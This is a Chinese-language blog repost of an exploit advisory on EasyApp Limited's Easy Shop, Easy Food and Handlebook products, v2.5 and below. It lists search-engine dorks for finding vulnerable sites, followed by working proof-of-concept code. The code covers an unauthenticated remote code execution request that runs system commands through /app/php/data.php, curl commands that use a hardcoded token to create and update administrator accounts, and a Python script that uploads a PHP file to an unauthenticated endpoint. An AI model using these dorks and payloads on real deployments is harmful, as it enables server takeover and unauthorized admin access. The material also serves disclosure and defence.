EasyApp Limited多漏洞分析:PHP反序列化与静态令牌绕过

本文详细披露了EasyApp Limited旗下多款产品存在的多个安全漏洞,包括PHP对象注入导致的远程代码执行、硬编码凭证造成的权限绕过以及未授权的任意文件上传与泄露,提供了完整的技术分析和概念验证(POC)代码。

Exploit标题:EasyApp Limited - 多个漏洞

日期:2025-06-27

漏洞作者:bRpsd -> cy[at]live.no

厂商主页:https://easyapp.com.hk/

受影响产品:Easy Shop, Easy Food, Handlebook

受影响版本:v2.5及以下

CVE:N/A

测试环境:localhost xampp, MacOS

Dork搜索词:

“Powered By Easyapp © 2025” Powered By EasyApp Limited inurl:app/web “Powered By EasyApp Limited” “DESIGN BY HANDLEBOOK EDUCATION SOLUTIONS © 2025” “EasyApp Login” inurl:/web/product_detail.php?linkid= inurl:app/admin2/login.php inurl:app/#!/template/newsList.php

########################################################################################## 漏洞1:PHP对象注入 “CWE-502: 不受信任数据的反序列化” 该函数直接处理来自php://input未经净化的JSON输入,导致未认证的远程代码执行(RCE)。

文件: /app/php/data.php

相关代码:

1
2
3
4
5

$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true) ; 
// 调用自定义函数
echo json_encode($json["action"]($json["data"]));

概念验证(POC):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive
Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"action":"system","data":"whoami"}


响应:
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

root
"root"

使用CURL命令:

1
2
3
4
5

curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'

"Darwin"

########################################################################################## 漏洞2:静态令牌绕过 (CWE-798: 使用硬编码凭证) 文件: /app/admin2/php/data.php

相关代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

function getAppAccessRight($functionName,$param)
{
    $data = array();
    $data["status"] = "SUCCESS" ; 
    $uid = $_COOKIE["uid"] ; 
    $token = $_COOKIE["token"] ; 
    $escapeFunction = ESCAPE_FUNC_TOKEN ; 
    // echo $functionName . "<br/>";
    // echo $escapeFunction . "<br/>";
    if (strpos($escapeFunction, $functionName) !==false)
        return $data ; 
    if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
        return $data ;
}

这意味着通过/app/admin2/php/data.php调用任意管理功能可以被轻易绕过。我们可以使用这个硬编码令牌来(创建管理员、更新管理员)并直接触发许多其他基于管理员的函数:

POC:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "updateAdmin",
    "data": {
      "fullname": "X",
      "loginid": "XXXXXXXXXX",
      "pwd": "XXXXXXXXXX",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'
  
响应:
  {"uid":"UID_HERE","status":"SUCCESS"}


curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json" \
  -d '{
    "action": "createAdmin",
    "data": {
      "fullname": "X",
      "loginid": "X",
      "pwd": "X",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'
响应:
  {"uid":"UID_HERE","status":"SUCCESS"}

########################################################################################## 漏洞3:未认证的任意文件上传、删除与泄露 路径: app/admin2/userimg

直接访问会暴露上传到目录/app/admin2/userimg/的文件列表:

示例:

1

{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}

我们可以运行直接命令来上传/删除文件。

用于上传test.php的Python代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

import requests
# 定义URL和头部
url = "https://localhost/app/admin2/userimg/"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br, zstd",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://localhost/",
    "Connection": "keep-alive",
    "Referer": "https://localhost/app/admin2/news-list-add.php",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin"
}

# 接受文件的负载(某些设置允许直接上传PHP,有些则不允许)
payload = {
    'attachid': '1',
    'gtitle_zh': '1',
    'linkid': '1'
}

files = {
    'files[]': ('x.PhP', 'test', 'multipart/form-data')
}

response = requests.post(url, headers=headers, data=payload, files=files)

# 打印响应
print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)

其他未详细列出的弱点包括:

  1. 使用HTML JS重定向来阻止管理员访问[/app/admin2/],而不是使用基于PHP的代码。这意味着任何人都可以查看管理员仪表板及其HTML源代码并进行篡改。
  2. 依赖于可伪造的HTTP_CLIENT_IPHTTP_X_FORWARDED_FOR头部进行身份验证,存在IP地址欺骗风险。
  3. 弱加密。
  4. 缺乏CSRF/XSS/SQL注入控制。
  5. 代码生成控制不当,例如使用strpos($escapeFunction, $functionName)而不是strpos($functionName, $escapeFunction),在2FA激活中将"TRUE"拼写为"TURE"
  6. 可访问的测试文件,例如路径/app/admin2/testFn.php(存在任意文件上传漏洞)以及其他易受攻击的端点。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次